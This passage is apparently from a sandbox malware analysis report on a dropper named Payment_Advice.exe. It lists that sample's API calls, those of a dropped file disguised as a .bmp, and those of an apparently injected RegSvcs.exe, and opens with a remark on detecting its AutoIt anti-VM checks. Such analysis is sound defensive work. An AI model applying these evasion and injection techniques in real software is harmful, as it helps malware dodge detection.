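Two details matter when running this over raw memory strings rather than a decompiled script: a fragment that lost its first bytes (rocessExists(...) above) does not match and has to be caught by the full-string copy elsewhere in the dump, and the DriveSpaceFree("d:\") < 1 test is paired with the VMware probes because AutoIt reports 0 for a drive it cannot read, so the condition also holds on a machine with no D: drive at all.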
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 0_2_0051E6A3 VirtualQuery,GetSystemInfo
          Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 0_2_0050A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
          Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 0_2_0051C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
          Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 0_2_0052B348 FindFirstFileExA
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001DE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001EA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001EA488 FindFirstFileW,Sleep,FindNextFileW,FindClose
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001E65F1 FindFirstFileW,FindNextFileW,FindClose
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001AC642 FindFirstFileExW
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001E7248 FindFirstFileW,FindClose
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001E72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001DD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001DDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001E9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_00A5589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_00A54EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_00A50207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_00A63E66 FindFirstFileW,FindNextFileW,FindClose
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_00A4532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose
          Source: C:\Users\user\Desktop\Payment_Advice.exe | File Volume queried: C:\ FullSizeInformation
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_00175D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
          Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 0_2_00527DEE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_00195078 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_017A4164 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_017A4164 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01768158 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01764144 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01764144 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01764144 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01764144 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01764144 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_016D6154 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_016D6154 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_016CC156 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01700124 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01790115 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0177A118 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0177A118 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0177A118 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0177A118 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0177E10E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0177E10E mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0177E10E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0177E10E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0177E10E mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0177E10E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0177E10E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0177E10E mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0177E10E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0177E10E mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_017001F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_017A61E5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0174E1D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174E1D0 mov eax, dword ptr fs:[00000030h]14_2_0174E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174E1D0 mov ecx, dword ptr fs:[00000030h]14_2_0174E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174E1D0 mov eax, dword ptr fs:[00000030h]14_2_0174E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174E1D0 mov eax, dword ptr fs:[00000030h]14_2_0174E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017961C3 mov eax, dword ptr fs:[00000030h]14_2_017961C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017961C3 mov eax, dword ptr fs:[00000030h]14_2_017961C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175019F mov eax, dword ptr fs:[00000030h]14_2_0175019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175019F mov eax, dword ptr fs:[00000030h]14_2_0175019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175019F mov eax, dword ptr fs:[00000030h]14_2_0175019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175019F mov eax, dword ptr fs:[00000030h]14_2_0175019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0178C188 mov eax, dword ptr fs:[00000030h]14_2_0178C188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0178C188 mov eax, dword ptr fs:[00000030h]14_2_0178C188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01710185 mov eax, dword ptr fs:[00000030h]14_2_01710185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01774180 mov eax, dword ptr fs:[00000030h]14_2_01774180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01774180 mov eax, dword ptr fs:[00000030h]14_2_01774180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CA197 mov eax, dword ptr fs:[00000030h]14_2_016CA197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CA197 mov eax, dword ptr fs:[00000030h]14_2_016CA197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CA197 mov eax, dword ptr fs:[00000030h]14_2_016CA197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FC073 mov eax, dword ptr fs:[00000030h]14_2_016FC073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01756050 mov eax, dword ptr fs:[00000030h]14_2_01756050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D2050 mov eax, dword ptr fs:[00000030h]14_2_016D2050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01766030 mov eax, dword ptr fs:[00000030h]14_2_01766030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CA020 mov eax, dword ptr fs:[00000030h]14_2_016CA020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CC020 mov eax, dword ptr fs:[00000030h]14_2_016CC020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01754000 mov ecx, dword ptr fs:[00000030h]14_2_01754000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01772000 mov eax, dword ptr fs:[00000030h]14_2_01772000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01772000 mov eax, dword ptr fs:[00000030h]14_2_01772000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01772000 mov eax, dword ptr fs:[00000030h]14_2_01772000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01772000 mov eax, dword ptr fs:[00000030h]14_2_01772000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01772000 mov eax, dword ptr fs:[00000030h]14_2_01772000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01772000 mov eax, dword ptr fs:[00000030h]14_2_01772000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01772000 mov eax, dword ptr fs:[00000030h]14_2_01772000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01772000 mov eax, dword ptr fs:[00000030h]14_2_01772000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016EE016 mov eax, dword ptr fs:[00000030h]14_2_016EE016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016EE016 mov eax, dword ptr fs:[00000030h]14_2_016EE016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016EE016 mov eax, dword ptr fs:[00000030h]14_2_016EE016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016EE016 mov eax, dword ptr fs:[00000030h]14_2_016EE016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017120F0 mov ecx, dword ptr fs:[00000030h]14_2_017120F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D80E9 mov eax, dword ptr fs:[00000030h]14_2_016D80E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CA0E3 mov ecx, dword ptr fs:[00000030h]14_2_016CA0E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017560E0 mov eax, dword ptr fs:[00000030h]14_2_017560E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CC0F0 mov eax, dword ptr fs:[00000030h]14_2_016CC0F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017520DE mov eax, dword ptr fs:[00000030h]14_2_017520DE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017960B8 mov eax, dword ptr fs:[00000030h]14_2_017960B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017960B8 mov ecx, dword ptr fs:[00000030h]14_2_017960B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016C80A0 mov eax, dword ptr fs:[00000030h]14_2_016C80A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017680A8 mov eax, dword ptr fs:[00000030h]14_2_017680A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D208A mov eax, dword ptr fs:[00000030h]14_2_016D208A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177437C mov eax, dword ptr fs:[00000030h]14_2_0177437C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01778350 mov ecx, dword ptr fs:[00000030h]14_2_01778350
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175035C mov eax, dword ptr fs:[00000030h]14_2_0175035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175035C mov eax, dword ptr fs:[00000030h]14_2_0175035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175035C mov eax, dword ptr fs:[00000030h]14_2_0175035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175035C mov ecx, dword ptr fs:[00000030h]14_2_0175035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175035C mov eax, dword ptr fs:[00000030h]14_2_0175035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175035C mov eax, dword ptr fs:[00000030h]14_2_0175035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179A352 mov eax, dword ptr fs:[00000030h]14_2_0179A352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A634F mov eax, dword ptr fs:[00000030h]14_2_017A634F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A8324 mov eax, dword ptr fs:[00000030h]14_2_017A8324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A8324 mov ecx, dword ptr fs:[00000030h]14_2_017A8324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A8324 mov eax, dword ptr fs:[00000030h]14_2_017A8324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A8324 mov eax, dword ptr fs:[00000030h]14_2_017A8324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170A30B mov eax, dword ptr fs:[00000030h]14_2_0170A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170A30B mov eax, dword ptr fs:[00000030h]14_2_0170A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170A30B mov eax, dword ptr fs:[00000030h]14_2_0170A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CC310 mov ecx, dword ptr fs:[00000030h]14_2_016CC310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F0310 mov ecx, dword ptr fs:[00000030h]14_2_016F0310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E03E9 mov eax, dword ptr fs:[00000030h]14_2_016E03E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E03E9 mov eax, dword ptr fs:[00000030h]14_2_016E03E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E03E9 mov eax, dword ptr fs:[00000030h]14_2_016E03E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E03E9 mov eax, dword ptr fs:[00000030h]14_2_016E03E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E03E9 mov eax, dword ptr fs:[00000030h]14_2_016E03E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E03E9 mov eax, dword ptr fs:[00000030h]14_2_016E03E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E03E9 mov eax, dword ptr fs:[00000030h]14_2_016E03E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E03E9 mov eax, dword ptr fs:[00000030h]14_2_016E03E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017063FF mov eax, dword ptr fs:[00000030h]14_2_017063FF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016EE3F0 mov eax, dword ptr fs:[00000030h]14_2_016EE3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016EE3F0 mov eax, dword ptr fs:[00000030h]14_2_016EE3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016EE3F0 mov eax, dword ptr fs:[00000030h]14_2_016EE3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017743D4 mov eax, dword ptr fs:[00000030h]14_2_017743D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017743D4 mov eax, dword ptr fs:[00000030h]14_2_017743D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177E3DB mov eax, dword ptr fs:[00000030h]14_2_0177E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177E3DB mov eax, dword ptr fs:[00000030h]14_2_0177E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177E3DB mov ecx, dword ptr fs:[00000030h]14_2_0177E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177E3DB mov eax, dword ptr fs:[00000030h]14_2_0177E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA3C0 mov eax, dword ptr fs:[00000030h]14_2_016DA3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA3C0 mov eax, dword ptr fs:[00000030h]14_2_016DA3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA3C0 mov eax, dword ptr fs:[00000030h]14_2_016DA3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA3C0 mov eax, dword ptr fs:[00000030h]14_2_016DA3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA3C0 mov eax, dword ptr fs:[00000030h]14_2_016DA3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA3C0 mov eax, dword ptr fs:[00000030h]14_2_016DA3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D83C0 mov eax, dword ptr fs:[00000030h]14_2_016D83C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D83C0 mov eax, dword ptr fs:[00000030h]14_2_016D83C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D83C0 mov eax, dword ptr fs:[00000030h]14_2_016D83C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D83C0 mov eax, dword ptr fs:[00000030h]14_2_016D83C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0178C3CD mov eax, dword ptr fs:[00000030h]14_2_0178C3CD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017563C0 mov eax, dword ptr fs:[00000030h]14_2_017563C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F438F mov eax, dword ptr fs:[00000030h]14_2_016F438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F438F mov eax, dword ptr fs:[00000030h]14_2_016F438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CE388 mov eax, dword ptr fs:[00000030h]14_2_016CE388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CE388 mov eax, dword ptr fs:[00000030h]14_2_016CE388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CE388 mov eax, dword ptr fs:[00000030h]14_2_016CE388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016C8397 mov eax, dword ptr fs:[00000030h]14_2_016C8397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016C8397 mov eax, dword ptr fs:[00000030h]14_2_016C8397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016C8397 mov eax, dword ptr fs:[00000030h]14_2_016C8397
